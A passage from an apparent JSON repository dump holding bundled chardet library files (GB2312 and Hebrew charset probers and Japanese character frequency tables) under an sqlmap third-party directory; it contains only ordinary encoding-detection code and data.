723,1984,3745,1314,1676,2488,1610,1449,3558,3569,2166,2098, 409,\n1011,2325,3704,2306, 818,1732,1383,1824,1844,3757, 999,2705,3497,1216,1423,2683,\n2426,2954,2501,2726,2229,1475,2554,5064,1971,1794,1666,2014,1343, 783, 724, 191,\n2434,1354,2220,5065,1763,2752,2472,4152, 131, 175,2885,3434,  92,1466,4920,2616,\n3871,3872,3866, 128,1551,1632, 669,1854,3682,4691,4125,1230, 188,2973,3290,1302,\n1213, 560,3266, 917, 763,3909,3249,1760, 868,1958, 764,1782,2097, 145,2277,3774,\n4462,  64,1491,3062, 971,2132,3606,2442, 221,1226,1617, 218, 323,1185,3207,3147,\n 571, 619,1473,1005,1744,2281, 449,1887,2396,3685, 275, 375,3816,1743,3844,3731,\n 845,1983,2350,4210,1377, 773, 967,3499,3052,3743,2725,4007,1697,1022,3943,1464,\n3264,2855,2722,1952,1029,2839,2467,  84,4383,2215, 820,1391,2015,2448,3672, 377,\n1948,2168, 797,2545,3536,2578,2645,  94,2874,1678, 405,1259,3071, 771, 546,1315,\n 470,1243,3083, 895,2468, 981, 969,2037, 846,4181, 653,1276,2928,  14,2594, 557,\n3007,2474, 156, 902,1338,1740,2574, 537,2518, 973,2282,2216,2433,1928, 138,2903,\n1293,2631,1612, 646,3457, 839,2935, 111, 496,2191,2847, 589,3186, 149,3994,2060,\n4031,2641,4067,3145,1870,  37,3597,2136,1025,2051,3009,3383,3549,1121,1016,3261,\n1301, 251,2446,2599,2153, 872,3246, 637, 334,3705, 831, 884, 921,3065,3140,4092,\n2198,1944, 246,2964, 108,2045,1152,1921,2308,1031, 203,3173,4170,1907,3890, 810,\n1401,2003,1690, 506, 647,1242,2828,1761,1649,3208,2249,1589,3709,2931,5156,1708,\n 498, 666,2613, 834,3817,1231, 184,2851,1124, 883,3197,2261,3710,1765,1553,2658,\n1178,2639,2351,  93,1193, 942,2538,2141,4402, 235,1821, 870,1591,2192,1709,1871,\n3341,1618,4126,2595,2334, 603, 651,  69, 701, 268,2662,3411,2555,1380,1606, 503,\n 448, 254,2371,2646, 574,1187,2309,1770, 322,2235,1292,1801, 305, 566,1133, 229,\n2067,2057, 706, 167, 483,2002,2672,3295,1820,3561,3067, 316, 378,2746,3452,1112,\n 136,1981, 507,1651,2917,1117, 285,4591, 182,2580,3522,1304, 335,3303,1835,2504,\n1795,1792,2248, 674,1018,2106,2449,1857,2292,2845, 976,3047,1781,2600,2727,1389,\n1281,  52,3152, 153, 265,3950, 672,3485,3951,4463, 430,1183, 365, 278,2169,  27,\n1407,1336,2304, 209,1340,1730,2202,1852,2403,2883, 979,1737,1062, 631,2829,2542,\n3876,2592, 825,2086,2226,3048,3625, 352,1417,3724, 542, 991, 431,1351,3938,1861,\n2294, 826,1361,2927,3142,3503,1738, 463,2462,2723, 582,1916,1595,2808, 400,3845,\n3891,2868,3621,2254,  58,2492,1123, 910,2160,2614,1372,1603,1196,1072,3385,1700,\n3267,1980, 696, 480,2430, 920, 799,1570,2920,1951,2041,4047,2540,1321,4223,2469,\n3562,2228,1271,2602, 401,2833,3351,2575,5157, 907,2312,1256, 410, 263,3507,1582,\n 996, 678,1849,2316,1480, 908,3545,2237, 703,2322, 667,1826,2849,1531,2604,2999,\n2407,3146,2151,2630,1786,3711, 469,3542, 497,3899,2409, 858, 837,4446,3393,1274,\n 786, 620,1845,2001,3311, 484, 308,3367,1204,1815,3691,2332,1532,2557,1842,2020,\n2724,1927,2333,4440, 567,  22,1673,2728,4475,1987,1858,1144,1597, 101,1832,3601,\n  12, 974,3783,4391, 951,1412,   1,3720, 453,4608,4041, 528,1041,1027,3230,2628,\n1129, 875,1051,3291,1203,2262,1069,2860,2799,2149,2615,3278, 144,1758,3040,  31,\n 475,1680, 366,2685,3184, 311,1642,4008,2466,5036,1593,1493,2809, 216,1420,1668,\n 233, 304,2128,3284, 232,1429,1768,1040,2008,3407,2740,2967,2543, 242,2133, 778,\n1565,2022,2620, 505,2189,2756,1098,2273, 372,1614, 708, 553,2846,2094,2278, 169,\n3626,2835,4161, 228,2674,3165, 809,1454,1309, 466,1705,1095, 900,3423, 880,2667,\n3751,5258,2317,3109,2571,4317,2766,1503,1342, 866,4447,1118,  63,2076, 314,1881,\n1348,1061, 172, 978,3515,1747, 532, 511,3970,   6, 601, 905,2699,3300,1751, 276,\n1467,3725,2668,  65,4239,2544,2779,2556,1604, 578,2451,1802, 992,2331,2624,1320,\n3446, 713,1513,1013, 103,2786,2447,1661, 886,1702, 916, 654,3574,2031,1556, 751,\n2178,2821,2179,1498,1538,2176, 271, 914,2251,2080,1325, 638,1953,2937,3877,2432,\n2754,  95,3265,1716, 260,1227,4083, 775, 106,1357,3254, 426,1607, 555,2480, 772,\n1985, 244,2546, 474, 495,1046,2611,1851,2061,  71,2089,1675,2590, 742,3758,2843,\n3222,1433, 267,2180,2576,2826,2233,2092,3913,2435, 956,1745,3075, 856,2113,1116,\n 451,   3,1988,2896,1398, 993,2463,1878,2049,1341,2718,2721,2870,2108, 712,2904,\n4363,2753,2324, 277,2872,2349,2649, 384, 987, 435, 691,3000, 922, 164,3939, 652,\n1500,1184,4153,2482,3373,2165,4848,2335,3775,3508,3154,2806,2830,1554,2102,1664,\n2530,1434,2408, 893,1547,2623,3447,2832,2242,2532,3169,2856,3223,2078,  49,3770,\n3469, 462, 318, 656,2259,3250,3069, 679,1629,2758, 344,1138,1104,3120,1836,1283,\n3115,2154,1437,4448, 934, 759,1999, 794,2862,1038, 533,2560,1722,2342, 855,2626,\n1197,1663,4476,3127,  85,4240,2528,  25,1111,1181,3673, 407,3470,4561,2679,2713,\n 768,1925,2841,3986,1544,1165, 932, 373,1240,2146,1930,2673, 721,4766, 354,4333,\n 391,2963, 187,  61,3364,1442,1102, 330,1940,1767, 341,3809,4118, 393,2496,2062,\n2211, 105, 331, 300, 439, 913,1332, 626, 379,3304,1557, 328, 689,3952, 309,1555,\n 931, 317,2517,3027, 325, 569, 686,2107,3084,  60,1042,1333,2794, 264,3177,4014,\n1628, 258,3712,   7,4464,1176,1043,1778, 683, 114,1975,  78,1492, 383,1886, 510,\n 386, 645,5291,2891,2069,3305,4138,3867,2939,2603,2493,1935,1066,1848,3588,1015,\n1282,1289,4609, 697,1453,3044,2666,3611,1856,2412,  54, 719,1330, 568,3778,2459,\n1748, 788, 492, 551,1191,1000, 488,3394,3763, 282,1799, 348,2016,1523,3155,2390,\n1049, 382,2019,1788,1170, 729,2968,3523, 897,3926,2785,2938,3292, 350,2319,3238,\n1718,1717,2655,3453,3143,4465, 161,2889,2980,2009,1421,  56,1908,1640,2387,2232,\n1917,1874,2477,4921, 148,  83,3438, 592,4245,2882,1822,1055, 741, 115,1496,1624,\n 381,1638,4592,1020, 516,3214, 458, 947,4575,1432, 211,1514,2926,1865,2142, 189,\n 852,1221,1400,1486, 882,2299,4036, 351,  28,1122, 700,6479,6480,6481,6482,6483,  #last 512\n)\n\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/gb2312prober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .mbcharsetprober import MultiByteCharSetProber\nfrom .codingstatemachine import CodingStateMachine\nfrom .chardistribution import GB2312DistributionAnalysis\nfrom .mbcssm import GB2312_SM_MODEL\n\nclass GB2312Prober(MultiByteCharSetProber):\n    def __init__(self):\n        super(GB2312Prober, self).__init__()\n        self.coding_sm = CodingStateMachine(GB2312_SM_MODEL)\n        self.distribution_analyzer = GB2312DistributionAnalysis()\n        self.reset()\n\n    @property\n    def charset_name(self):\n        return \"GB2312\"\n\n    @property\n    def language(self):\n        return \"Chinese\"\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/hebrewprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Universal charset detector code.\n#\n# The Initial Developer of the Original Code is\n#          Shy Shalom\n# Portions created by the Initial Developer are Copyright (C) 2005\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .charsetprober import CharSetProber\nfrom .enums import ProbingState\n\n# This prober doesn't actually recognize a language or a charset.\n# It is a helper prober for the use of the Hebrew model probers\n\n### General ideas of the Hebrew charset recognition ###\n#\n# Four main charsets exist in Hebrew:\n# \"ISO-8859-8\" - Visual Hebrew\n# \"windows-1255\" - Logical Hebrew\n# \"ISO-8859-8-I\" - Logical Hebrew\n# \"x-mac-hebrew\" - ?? Logical Hebrew ??\n#\n# Both \"ISO\" charsets use a completely identical set of code points, whereas\n# \"windows-1255\" and \"x-mac-hebrew\" are two different proper supersets of\n# these code points. windows-1255 defines additional characters in the range\n# 0x80-0x9F as some misc punctuation marks as well as some Hebrew-specific\n# diacritics and additional 'Yiddish' ligature letters in the range 0xc0-0xd6.\n# x-mac-hebrew defines similar additional code points but with a different\n# mapping.\n#\n# As far as an average Hebrew text with no diacritics is concerned, all four\n# charsets are identical with respect to code points. Meaning that for the\n# main Hebrew alphabet, all four map the same values to all 27 Hebrew letters\n# (including final letters).\n#\n# The dominant difference between these charsets is their directionality.\n# \"Visual\" directionality means that the text is ordered as if the renderer is\n# not aware of a BIDI rendering algorithm. The renderer sees the text and\n# draws it from left to right. The text itself when ordered naturally is read\n# backwards. A buffer of Visual Hebrew generally looks like so:\n# \"[last word of first line spelled backwards] [whole line ordered backwards\n# and spelled backwards] [first word of first line spelled backwards]\n# [end of line] [last word of second line] ... etc' \"\n# adding punctuation marks, numbers and English text to visual text is\n# naturally also \"visual\" and from left to right.\n#\n# \"Logical\" directionality means the text is ordered \"naturally\" according to\n# the order it is read. It is the responsibility of the renderer to display\n# the text from right to left. A BIDI algorithm is used to place general\n# punctuation marks, numbers and English text in the text.\n#\n# Texts in x-mac-hebrew are almost impossible to find on the Internet. From\n# what little evidence I could find, it seems that its general directionality\n# is Logical.\n#\n# To sum up all of the above, the Hebrew probing mechanism knows about two\n# charsets:\n# Visual Hebrew - \"ISO-8859-8\" - backwards text - Words and sentences are\n#    backwards while line order is natural. For charset recognition purposes\n#    the line order is unimportant (In fact, for this implementation, even\n#    word order is unimportant).\n# Logical Hebrew - \"windows-1255\" - normal, naturally ordered text.\n#\n# \"ISO-8859-8-I\" is a subset of windows-1255 and doesn't need to be\n#    specifically identified.\n# \"x-mac-hebrew\" is also identified as windows-1255. A text in x-mac-hebrew\n#    that contain special punctuation marks or diacritics is displayed with\n#    some unconverted characters showing as question marks. This problem might\n#    be corrected using another model prober for x-mac-hebrew. Due to the fact\n#    that x-mac-hebrew texts are so rare, writing another model prober isn't\n#    worth the effort and performance hit.\n#\n#### The Prober ####\n#\n# The prober is divided between two SBCharSetProbers and a HebrewProber,\n# all of which are managed, created, fed data, inquired and deleted by the\n# SBCSGroupProber. The two SBCharSetProbers identify that the text is in\n# fact some kind of Hebrew, Logical or Visual. The final decision about which\n# one is it is made by the HebrewProber by combining final-letter scores\n# with the scores of the two SBCharSetProbers to produce a final answer.\n#\n# The SBCSGroupProber is responsible for stripping the original text of HTML\n# tags, English characters, numbers, low-ASCII punctuation characters, spaces\n# and new lines. It reduces any sequence of such characters to a single space.\n# The buffer fed to each prober in the SBCS group prober is pure text in\n# high-ASCII.\n# The two SBCharSetProbers (model probers) share the same language model:\n# Win1255Model.\n# The first SBCharSetProber uses the model normally as any other\n# SBCharSetProber does, to recognize windows-1255, upon which this model was\n# built. The second SBCharSetProber is told to make the pair-of-letter\n# lookup in the language model backwards. This in practice exactly simulates\n# a visual Hebrew model using the windows-1255 logical Hebrew model.\n#\n# The HebrewProber is not using any language model. All it does is look for\n# final-letter evidence suggesting the text is either logical Hebrew or visual\n# Hebrew. Disjointed from the model probers, the results of the HebrewProber\n# alone are meaningless. HebrewProber always returns 0.00 as confidence\n# since it never identifies a charset by itself. Instead, the pointer to the\n# HebrewProber is passed to the model probers as a helper \"Name Prober\".\n# When the Group prober receives a positive identification from any prober,\n# it asks for the name of the charset identified. If the prober queried is a\n# Hebrew model prober, the model prober forwards the call to the\n# HebrewProber to make the final decision. In the HebrewProber, the\n# decision is made according to the final-letters scores maintained and Both\n# model probers scores. The answer is returned in the form of the name of the\n# charset identified, either \"windows-1255\" or \"ISO-8859-8\".\n\nclass HebrewProber(CharSetProber):\n    # windows-1255 / ISO-8859-8 code points of interest\n    FINAL_KAF = 0xea\n    NORMAL_KAF = 0xeb\n    FINAL_MEM = 0xed\n    NORMAL_MEM = 0xee\n    FINAL_NUN = 0xef\n    NORMAL_NUN = 0xf0\n    FINAL_PE = 0xf3\n    NORMAL_PE = 0xf4\n    FINAL_TSADI = 0xf5\n    NORMAL_TSADI = 0xf6\n\n    # Minimum Visual vs Logical final letter score difference.\n    # If the difference is below this, don't rely solely on the final letter score\n    # distance.\n    MIN_FINAL_CHAR_DISTANCE = 5\n\n    # Minimum Visual vs Logical model score difference.\n    # If the difference is below this, don't rely at all on the model score\n    # distance.\n    MIN_MODEL_DISTANCE = 0.01\n\n    VISUAL_HEBREW_NAME = \"ISO-8859-8\"\n    LOGICAL_HEBREW_NAME = \"windows-1255\"\n\n    def __init__(self):\n        super(HebrewProber, self).__init__()\n        self._final_char_logical_score = None\n        self._final_char_visual_score = None\n        self._prev = None\n        self._before_prev = None\n        self._logical_prober = None\n        self._visual_prober = None\n        self.reset()\n\n    def reset(self):\n        self._final_char_logical_score = 0\n        self._final_char_visual_score = 0\n        # The two last characters seen in the previous buffer,\n        # mPrev and mBeforePrev are initialized to space in order to simulate\n        # a word delimiter at the beginning of the data\n        self._prev = ' '\n        self._before_prev = ' '\n        # These probers are owned by the group prober.\n\n    def set_model_probers(self, logicalProber, visualProber):\n        self._logical_prober = logicalProber\n        self._visual_prober = visualProber\n\n    def is_final(self, c):\n        return c in [self.FINAL_KAF, self.FINAL_MEM, self.FINAL_NUN,\n                     self.FINAL_PE, self.FINAL_TSADI]\n\n    def is_non_final(self, c):\n        # The normal Tsadi is not a good Non-Final letter due to words like\n        # 'lechotet' (to chat) containing an apostrophe after the tsadi. This\n        # apostrophe is converted to a space in FilterWithoutEnglishLetters\n        # causing the Non-Final tsadi to appear at an end of a word even\n        # though this is not the case in the original text.\n        # The letters Pe and Kaf rarely display a related behavior of not being\n        # a good Non-Final letter. Words like 'Pop', 'Winamp' and 'Mubarak'\n        # for example legally end with a Non-Final Pe or Kaf. However, the\n        # benefit of these letters as Non-Final letters outweighs the damage\n        # since these words are quite rare.\n        return c in [self.NORMAL_KAF, self.NORMAL_MEM,\n                     self.NORMAL_NUN, self.NORMAL_PE]\n\n    def feed(self, byte_str):\n        # Final letter analysis for logical-visual decision.\n        # Look for evidence that the received buffer is either logical Hebrew\n        # or visual Hebrew.\n        # The following cases are checked:\n        # 1) A word longer than 1 letter, ending with a final letter. This is\n        #    an indication that the text is laid out \"naturally\" since the\n        #    final letter really appears at the end. +1 for logical score.\n        # 2) A word longer than 1 letter, ending with a Non-Final letter. In\n        #    normal Hebrew, words ending with Kaf, Mem, Nun, Pe or Tsadi,\n        #    should not end with the Non-Final form of that letter. Exceptions\n        #    to this rule are mentioned above in isNonFinal(). This is an\n        #    indication that the text is laid out backwards. +1 for visual\n        #    score\n        # 3) A word longer than 1 letter, starting with a final letter. Final\n        #    letters should not appear at the beginning of a word. This is an\n        #    indication that the text is laid out backwards. +1 for visual\n        #    score.\n        #\n        # The visual score and logical score are accumulated throughout the\n        # text and are finally checked against each other in GetCharSetName().\n        # No checking for final letters in the middle of words is done since\n        # that case is not an indication for either Logical or Visual text.\n        #\n        # We automatically filter out all 7-bit characters (replace them with\n        # spaces) so the word boundary detection works properly. [MAP]\n\n        if self.state == ProbingState.NOT_ME:\n            # Both model probers say it's not them. No reason to continue.\n            return ProbingState.NOT_ME\n\n        byte_str = self.filter_high_byte_only(byte_str)\n\n        for cur in byte_str:\n            if cur == ' ':\n                # We stand on a space - a word just ended\n                if self._before_prev != ' ':\n                    # next-to-last char was not a space so self._prev is not a\n                    # 1 letter word\n                    if self.is_final(self._prev):\n                        # case (1) [-2:not space][-1:final letter][cur:space]\n                        self._final_char_logical_score += 1\n                    elif self.is_non_final(self._prev):\n                        # case (2) [-2:not space][-1:Non-Final letter][\n                        #  cur:space]\n                        self._final_char_visual_score += 1\n            else:\n                # Not standing on a space\n                if ((self._before_prev == ' ') and\n                        (self.is_final(self._prev)) and (cur != ' ')):\n                    # case (3) [-2:space][-1:final letter][cur:not space]\n                    self._final_char_visual_score += 1\n            self._before_prev = self._prev\n            self._prev = cur\n\n        # Forever detecting, till the end or until both model probers return\n        # ProbingState.NOT_ME (handled above)\n        return ProbingState.DETECTING\n\n    @property\n    def charset_name(self):\n        # Make the decision: is it Logical or Visual?\n        # If the final letter score distance is dominant enough, rely on it.\n        finalsub = self._final_char_logical_score - self._final_char_visual_score\n        if finalsub >= self.MIN_FINAL_CHAR_DISTANCE:\n            return self.LOGICAL_HEBREW_NAME\n        if finalsub <= -self.MIN_FINAL_CHAR_DISTANCE:\n            return self.VISUAL_HEBREW_NAME\n\n        # It's not dominant enough, try to rely on the model scores instead.\n        modelsub = (self._logical_prober.get_confidence()\n                    - self._visual_prober.get_confidence())\n        if modelsub > self.MIN_MODEL_DISTANCE:\n            return self.LOGICAL_HEBREW_NAME\n        if modelsub < -self.MIN_MODEL_DISTANCE:\n            return self.VISUAL_HEBREW_NAME\n\n        # Still no good, back to final letter distance, maybe it'll save the\n        # day.\n        if finalsub < 0.0:\n            return self.VISUAL_HEBREW_NAME\n\n        # (finalsub > 0 - Logical) or (don't know what to do) default to\n        # Logical.\n        return self.LOGICAL_HEBREW_NAME\n\n    @property\n    def language(self):\n        return 'Hebrew'\n\n    @property\n    def state(self):\n        # Remain active as long as any of the model probers are active.\n        if (self._logical_prober.state == ProbingState.NOT_ME) and \\\n           (self._visual_prober.state == ProbingState.NOT_ME):\n            return ProbingState.NOT_ME\n        return ProbingState.DETECTING\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/jisfreq.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# Sampling from about 20M text materials include literature and computer technology\n#\n# Japanese frequency table, applied to both S-JIS and EUC-JP\n# They are sorted in order.\n\n# 128  --> 0.77094\n# 256  --> 0.85710\n# 512  --> 0.92635\n# 1024 --> 0.97130\n# 2048 --> 0.99431\n#\n# Ideal Distribution Ratio = 0.92635 / (1-0.92635) = 12.58\n# Random Distribution Ration = 512 / (2965+62+83+86-512) = 0.191\n#\n# Typical Distribution Ratio, 25% of IDR\n\nJIS_TYPICAL_DISTRIBUTION_RATIO = 3.0\n\n# Char to FreqOrder table ,\nJIS_TABLE_SIZE = 4368\n\nJIS_CHAR_TO_FREQ_ORDER = (\n  40,   1,   6, 182, 152, 180, 295,2127, 285, 381,3295,4304,3068,4606,3165,3510, #   16\n3511,1822,2785,4607,1193,2226,5070,4608, 171,2996,1247,  18, 179,5071, 856,1661, #   32\n1262,5072, 619, 127,3431,3512,3230,1899,1700, 232, 228,1294,1298, 284, 283,2041, #   48\n2042,1061,1062,  48,  49,  44,  45, 433, 434,1040,1041, 996, 787,2997,1255,4305, #   64\n2108,4609,1684,1648,5073,5074,5075,5076,5077,5078,3687,5079,4610,5080,3927,3928, #   80\n5081,3296,3432, 290,2285,1471,2187,5082,2580,2825,1303,2140,1739,1445,2691,3375, #   96\n1691,3297,4306,4307,4611, 452,3376,1182,2713,3688,3069,4308,5083,5084,5085,5086, #  112\n5087,5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102, #  128\n5103,5104,5105,5106,5107,5108,5109,5110,5111,5112,4097,5113,5114,5115,5116,5117, #  144\n5118,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,5130,5131,5132,5133, #  160\n5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,5149, #  176\n5150,5151,5152,4612,5153,5154,5155,5156,5157,5158,5159,5160,5161,5162,5163,5164, #  192\n5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,1472, 598, 618, 820,1205, #  208\n1309,1412,1858,1307,1692,5176,5177,5178,5179,5180,5181,5182,1142,1452,1234,1172, #  224\n1875,2043,2149,1793,1382,2973, 925,2404,1067,1241, 960,1377,2935,1491, 919,1217, #  240\n1865,2030,1406,1499,2749,4098,5183,5184,5185,5186,5187,5188,2561,4099,3117,1804, #  256\n2049,3689,4309,3513,1663,5189,3166,3118,3298,1587,1561,3433,5190,3119,1625,2998, #  272\n3299,4613,1766,3690,2786,4614,5191,5192,5193,5194,2161,  26,3377,   2,3929,  20, #  288\n3691,  47,4100,  50,  17,  16,  35, 268,  27, 243,  42, 155,  24, 154,  29, 184, #  304\n   4,  91,  14,  92,  53, 396,  33, 289,   9,  37,  64, 620,  21,  39, 321,   5, #  320\n  12,  11,  52,  13,   3, 208, 138,   0,   7,  60, 526, 141, 151,1069, 181, 275, #  336\n1591,  83, 132,1475, 126, 331, 829,  15,  69, 160,  59,  22, 157,  55,1079, 312, #  352\n 109,  38,  23,  25,  10,  19,  79,5195,  61, 382,1124,   8,  30,5196,5197,5198, #  368\n5199,5200,5201,5202,5203,5204,5205,5206,  89,  62,  74,  34,2416, 112, 139, 196, #  384\n 271, 149,  84, 607, 131, 765,  46,  88, 153, 683,  76, 874, 101, 258,  57,  80, #  400\n  32, 364, 121,1508, 169,1547,  68, 235, 145,2999,  41, 360,3027,  70,  63,  31, #  416\n  43, 259, 262,1383,  99, 533, 194,  66,  93, 846, 217, 192,  56, 106,  58, 565, #  432\n 280, 272, 311, 256, 146,  82, 308,  71, 100, 128, 214, 655, 110, 261, 104,1140, #  448\n  54,  51,  36,  87,  67,3070, 185,2618,2936,2020,  28,1066,2390,2059,5207,5208, #  464\n5209,5210,5211,5212,5213,5214,5215,5216,4615,5217,5218,5219,5220,5221,5222,5223, #  480\n5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,5235,5236,3514,5237,5238, #  496\n5239,5240,5241,5242,5243,5244,2297,2031,4616,4310,3692,5245,3071,5246,3598,5247, #  512\n4617,3231,3515,5248,4101,4311,4618,3808,4312,4102,5249,4103,4104,3599,5250,5251, #  528\n5252,5253,5254,5255,5256,5257,5258,5259,5260,5261,5262,5263,5264,5265,5266,5267, #  544\n5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,5279,5280,5281,5282,5283, #  560\n5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,5294,5295,5296,5297,5298,5299, #  576\n5300,5301,5302,5303,5304,5305,5306,5307,5308,5309,5310,5311,5312,5313,5314,5315, #  592\n5316,5317,5318,5319,5320,5321,5322,5323,5324,5325,5326,5327,5328,5329,5330,5331, #  608\n5332,5333,5334,5335,5336,5337,5338,5339,5340,5341,5342,5343,5344,5345,5346,5347, #  624\n5348,5349,5350,5351,5352,5353,5354,5355,5356,5357,5358,5359,5360,5361,5362,5363, #  640\n5364,5365,5366,5367,5368,5369,5370,5371,5372,5373,5374,5375,5376,5377,5378,5379, #  656\n5380,5381, 363, 642,2787,2878,2788,2789,2316,3232,2317,3434,2011, 165,1942,3930, #  672\n3931,3932,3933,5382,4619,5383,4620,5384,5385,5386,5387,5388,5389,5390,5391,5392, #  688\n5393,5394,5395,5396,5397,5398,5399,5400,5401,5402,5403,5404,5405,5406,5407,5408, #  704\n5409,5410,5411,5412,5413,5414,5415,5416,5417,5418,5419,5420,5421,5422,5423,5424, #  720\n5425,5426,5427,5428,5429,5430,5431,5432,5433,5434,5435,5436,5437,5438,5439,5440, #  736\n5441,5442,5443,5444,5445,5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456, #  752\n5457,5458,5459,5460,5461,5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472, #  768\n5473,5474,5475,5476,5477,5478,5479,5480,5481,5482,5483,5484,5485,5486,5487,5488, #  784\n5489,5490,5491,5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504, #  800\n5505,5506,5507,5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520, #  816\n5521,5522,5523,5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536, #  832\n5537,5538,5539,5540,5541,5542,5543,5544,5545,5546,5547,5548,5549,5550,5551,5552, #  848\n5553,5554,5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568, #  864\n5569,5570,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584, #  880\n5585,5586,5587,5588,5589,5590,5591,5592,5593,5594,5595,5596,5597,5598,5599,5600, #  896\n5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,5615,5616, #  912\n5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,5632, #  928\n5633,5634,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,5647,5648, #  944\n5649,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,5661,5662,5663,5664, #  960\n5665,5666,5667,5668,5669,5670,5671,5672,5673,5674,5675,5676,5677,5678,5679,5680, #  976\n5681,5682,5683,5684,5685,5686,5687,5688,5689,5690,5691,5692,5693,5694,5695,5696, #  992\n5697,5698,5699,5700,5701,5702,5703,5704,5705,5706,5707,5708,5709,5710,5711,5712, # 1008\n5713,5714,5715,5716,5717,5718,5719,5720,5721,5722,5723,5724,5725,5726,5727,5728, # 1024\n5729,5730,5731,5732,5733,5734,5735,5736,5737,5738,5739,5740,5741,5742,5743,5744, # 1040\n5745,5746,5747,5748,5749,5750,5751,5752,5753,5754,5755,5756,5757,5758,5759,5760, # 1056\n5761,5762,5763,5764,5765,5766,5767,5768,5769,5770,5771,5772,5773,5774,5775,5776, # 1072\n5777,5778,5779,5780,5781,5782,5783,5784,5785,5786,5787,5788,5789,5790,5791,5792, # 1088\n5793,5794,5795,5796,5797,5798,5799,5800,5801,5802,5803,5804,5805,5806,5807,5808, # 1104\n5809,5810,5811,5812,5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824, # 1120\n5825,5826,5827,5828,5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840, # 1136\n5841,5842,5843,5844,5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856, # 1152\n5857,5858,5859,5860,5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872, # 1168\n5873,5874,5875,5876,5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888, # 1184\n5889,5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904, # 1200\n5905,5906,5907,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920, # 1216\n5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936, # 1232\n5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952, # 1248\n5953,5954,5955,5956,5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968, # 1264\n5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984, # 1280\n5985,5986,5987,5988,5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000, # 1296\n6001,6002,6003,6004,6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016, # 1312\n6017,6018,6019,6020,6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032, # 